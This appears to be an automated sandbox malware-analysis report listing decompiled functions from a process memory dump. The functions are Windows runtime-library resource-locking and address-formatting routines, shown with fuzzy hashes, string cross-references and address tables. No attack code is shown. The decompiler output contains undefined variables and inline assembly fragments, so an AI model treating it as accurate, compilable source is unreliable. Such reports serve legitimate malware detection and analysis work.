Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 9b84573d10fbea3d5aa5c6a506d46defb02716f26629cc29f82087232c623e00
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 91A19C75E0120AEFCB28DF64C8486FEB7B5AF15308F24846ADA12B7281EF349645CB55

Uniqueness

Uniqueness Score: -1.00%

Function 02740554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E02740554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027e01c0;
									_push(_t144);
									_push(0);
									_t51 = E026FF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02744FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02753F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02753F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0278217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02753F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02743915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x027e01c0;
												_push(_t138);
												_push(0);
												_t58 = E026FF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02744FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02753F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02753F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0278217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02753F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02743915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02725384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E026FF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02743915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E026FF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02743915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E026FF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02743915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E02725329(_t110, _t138);
																_t69 = E027253A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0274055a
0x0274055d
0x02740563
0x02740566
0x027405d8
0x027405e2
0x027405e5
0x00000000
0x027405e7
0x027405e7
0x027405ea
0x027405f3
0x027405f3
0x02740568
0x02740568
0x02740568
0x02740569
0x02740569
0x02740569
0x0274056b
0x00000000
0x00000000
0x0276217f
0x02762183
0x0276225b
0x0276225f
0x02762189
0x0276218c
0x0276218f
0x02762194
0x02762199
0x0276219d
0x027621a0
0x027621a2
0x027621ce
0x027621ce
0x027621ce
0x027621d0
0x027621d6
0x027621de
0x027621e2
0x027621e8
0x027621e9
0x027621ec
0x027621f1
0x027621f6
0x00000000
0x00000000
0x027621f8
0x027621fb
0x02762206
0x0276220b
0x0276220c
0x02762217
0x02762226
0x0276222b
0x0276222c
0x0276222f
0x02762232
0x02762235
0x02762235
0x0276223a
0x0276223f
0x02762241
0x02762243
0x02762248
0x02762248
0x0276224d
0x0276224f
0x02762262
0x02762263
0x02762268
0x02762269
0x02762269
0x02762269
0x0276226d
0x00000000
0x00000000
0x02762276
0x02762279
0x0276227e
0x02762283
0x02762287
0x0276228a
0x0276228d
0x0276228f
0x027622bc
0x027622bc
0x027622bc
0x027622be
0x027622c4
0x027622cc
0x027622d0
0x027622d6
0x027622d7
0x027622da
0x027622df
0x027622e4
0x00000000
0x00000000
0x027622e6
0x027622e9
0x027622f4
0x027622f9
0x027622fa
0x02762305
0x02762314
0x02762319
0x0276231a
0x0276231d
0x02762320
0x02762323
0x02762323
0x02762328
0x0276232d
0x0276232f
0x02762331
0x02762336
0x02762336
0x0276233b
0x0276233d
0x02762350
0x02762351
0x02762356
0x02762359
0x02762359
0x0276235b
0x0276235d
0x02725367
0x0272536b
0x02725372
0x00000000
0x00000000
0x00000000
0x00000000
0x02762363
0x02762363
0x02762369
0x0276236a
0x0276236c
0x02762371
0x02762373
0x00000000
0x02762379
0x02762379
0x0276237a
0x0276237f
0x0276237f
0x02762385
0x02762386
0x02762389
0x0276238e
0x02762390
0x02725378
0x0272537c
0x02762396
0x02762396
0x02762397
0x0276239c
0x027623a2
0x027623a3
0x027623a6
0x027623ab
0x027623ad
0x00000000
0x027623b3
0x027623b3
0x027623b4
0x027623b9
0x027623ba
0x027623ba
0x027623bc
0x027623bf
0x00000000
0x00000000
0x02759153
0x02759158
0x0275915a
0x0275915e
0x02759160
0x00000000
0x02759166
0x02759166
0x02759171
0x02759176
0x02759176
0x00000000
0x02759160
0x027623c6
0x027623ce
0x027623d7
0x027623d7
0x027623ad
0x02762390
0x02762373
0x0276233f
0x0276233f
0x00000000
0x0276233f
0x02762291
0x02762291
0x02762293
0x02762295
0x0276229a
0x027622a1
0x027622a3
0x027622a7
0x027622a9
0x00000000
0x00000000
0x027622ab
0x027622ad
0x027622af
0x00000000
0x00000000
0x00000000
0x027622af
0x027622b1
0x027622b4
0x027622b4
0x027622b6
0x027253be
0x027253be
0x027253be
0x027253c0
0x00000000
0x00000000
0x027253cb
0x027253ce
0x027253d0
0x027253d4
0x027253d6
0x00000000
0x027253d8
0x027253e3
0x027253ea
0x027253ea
0x00000000
0x027253d6
0x00000000
0x00000000
0x00000000
0x00000000
0x027622b6
0x00000000
0x0276228f
0x02762349
0x0276234d
0x02762251
0x02762251
0x00000000
0x02762251
0x027621a4
0x027621a4
0x027621a6
0x027621a8
0x027621ac
0x027621b6
0x027621b8
0x027621bc
0x027621be
0x00000000
0x00000000
0x027621c0
0x027621c2
0x027621c4
0x00000000
0x00000000
0x00000000
0x027621c4
0x027621c6
0x027621c6
0x027621c8
0x00000000
0x00000000
0x00000000
0x00000000
0x027621c8
0x027621a2
0x00000000
0x02762183
0x0274057b
0x0274057d
0x02740581
0x02740583
0x02762178
0x00000000
0x02740589
0x0274058f
0x0274058f
0x02740583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02762206

Strings

RTL: Re-Waiting, xrefs: 0276223A, 02762328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 027622FC
RTL: Resource at %p, xrefs: 0276221D, 0276230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0276220E

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: e0b0bfcb942a6d150d9a781dfdc705fa303c96bcc8425591e1956ce7299daf30
Instruction ID: 0f9bcecfacb544b01ba10467bf0af97d7b3ffc536c686f540233241da9583ec3
Opcode Fuzzy Hash: e0b0bfcb942a6d150d9a781dfdc705fa303c96bcc8425591e1956ce7299daf30
Instruction Fuzzy Hash: 39515A717042116FEB59CA19CCC8F7673AAAF88714F218269ED19DB2C6DB71EC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 027414C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E027414C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x27e2088; // 0x777f16a6
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02737707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E027413CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02737707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02737707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02702340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0270E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x027414c0
0x027414cb
0x027414d2
0x027414d6
0x027414da
0x027414de
0x027414e3
0x0274157a
0x0274157a
0x027414f1
0x027414f3
0x0276ea0f
0x00000000
0x0276ea15
0x00000000
0x0276ea15
0x027414f9
0x027414f9
0x027414fe
0x02741504
0x0276ea1a
0x0276ea1f
0x0276ea21
0x0276ea22
0x0276ea27
0x0276ea2a
0x0276ea2a
0x02741515
0x02741517
0x0274156d
0x02741572
0x02741575
0x02741575
0x0274151e
0x0276ea50
0x0276ea55
0x0276ea58
0x0276ea58
0x0274152e
0x02741531
0x02741533
0x00000000
0x02741535
0x02741541
0x02741549
0x02741549
0x02741533
0x027414f3
0x02741559

APIs

___swprintf_l.LIBCMT ref: 0276EA22

Part of subcall function 027413CB: ___swprintf_l.LIBCMT ref: 0274146B
Part of subcall function 027413CB: ___swprintf_l.LIBCMT ref: 02741490

___swprintf_l.LIBCMT ref: 0274156D

Strings

%%%u, xrefs: 02741564
]:%u, xrefs: 0276EA47

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 96dcdfe4c0e4e12e5415eb590b6a850c833247f1ad53024c36f4543820cc2efb
Instruction ID: 0e7b9ee938a65a32d90cbf95ad77250bbbf8efbd36404d118bb505402cc15f25
Opcode Fuzzy Hash: 96dcdfe4c0e4e12e5415eb590b6a850c833247f1ad53024c36f4543820cc2efb
Instruction Fuzzy Hash: 6D21D7B2900229DBDB21EE54CC44AFEB7BDAB10704F844455ED4AE3141EF70EA98CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 027253A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E027253A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x027e01c0;
									_push(_t92);
									_push(0);
									_t37 = E026FF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02744FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02753F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02753F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0278217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02753F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02743915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02725384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E026FF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02743915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E026FF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02743915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E026FF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02743915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E02725329(_t74, _t92);
													_push(1);
													_t48 = E027253A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x027253ab
0x027253ae
0x027253b1
0x027253b4
0x027253b7
0x027405b6
0x027405c0
0x027405c3
0x00000000
0x027405c9
0x027405c9
0x027405cc
0x027405d5
0x027405d5
0x027253bd
0x027253bd
0x027253bd
0x027253be
0x027253be
0x027253be
0x027253c0
0x00000000
0x00000000
0x02762269
0x0276226d
0x02762349
0x0276234d
0x02762273
0x02762276
0x02762279
0x0276227e
0x02762283
0x02762287
0x0276228a
0x0276228d
0x0276228f
0x027622bc
0x027622bc
0x027622bc
0x027622be
0x027622c4
0x027622cc
0x027622d0
0x027622d6
0x027622d7
0x027622da
0x027622df
0x027622e4
0x00000000
0x00000000
0x027622e6
0x027622e9
0x027622f4
0x027622f9
0x027622fa
0x02762305
0x02762314
0x02762319
0x0276231a
0x0276231d
0x02762320
0x02762323
0x02762323
0x02762328
0x0276232d
0x0276232f
0x02762331
0x02762336
0x02762336
0x0276233b
0x0276233d
0x02762350
0x02762351
0x02762356
0x02762359
0x02762359
0x0276235b
0x0276235d
0x02725367
0x0272536b
0x02725372
0x00000000
0x00000000
0x00000000
0x00000000
0x02762363
0x02762363
0x02762369
0x0276236a
0x0276236c
0x02762371
0x02762373
0x00000000
0x02762379
0x02762379
0x0276237a
0x0276237f
0x0276237f
0x02762385
0x02762386
0x02762389
0x0276238e
0x02762390
0x02725378
0x0272537c
0x02762396
0x02762396
0x02762397
0x0276239c
0x027623a2
0x027623a3
0x027623a6
0x027623ab
0x027623ad
0x00000000
0x027623b3
0x027623b3
0x027623b4
0x027623b9
0x027623ba
0x027623ba
0x027623bc
0x027623bf
0x00000000
0x00000000
0x02759153
0x02759158
0x0275915a
0x0275915e
0x02759160
0x00000000
0x02759166
0x02759166
0x02759171
0x02759176
0x02759176
0x00000000
0x02759160
0x027623c6
0x027623cb
0x027623ce
0x027623d7
0x027623d7
0x027623ad
0x02762390
0x02762373
0x0276233f
0x0276233f
0x00000000
0x0276233f
0x02762291
0x02762291
0x02762293
0x02762295
0x0276229a
0x027622a1
0x027622a3
0x027622a7
0x027622a9
0x00000000
0x00000000
0x027622ab
0x027622ad
0x027622af
0x00000000
0x00000000
0x00000000
0x027622af
0x027622b1
0x027622b4
0x027622b4
0x027622b6
0x00000000
0x00000000
0x00000000
0x00000000
0x027622b6
0x0276228f
0x00000000
0x0276226d
0x027253cb
0x027253ce
0x027253d0
0x027253d4
0x027253d6
0x00000000
0x027253d8
0x027253e3
0x027253ea
0x027253ea
0x027253d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 027622F4

Strings

RTL: Re-Waiting, xrefs: 02762328
RTL: Resource at %p, xrefs: 0276230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 027622FC

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: adf22207472e0777724a110fd64cf64a63dcc8f3d91e47b2b15672a13c31120f
Instruction ID: e0a88824e451f3396d175a36db7b7f4e674bced8a2c324da102f86c7ce0a0348
Opcode Fuzzy Hash: adf22207472e0777724a110fd64cf64a63dcc8f3d91e47b2b15672a13c31120f
Instruction Fuzzy Hash: AB51F8716006116BEF159F29CC84FA77399EF49328F114259FD09DB281EB61E8458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0272EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0272EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0271DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x27e793c; // 0x0
					_push(0);
					_push(_t84);
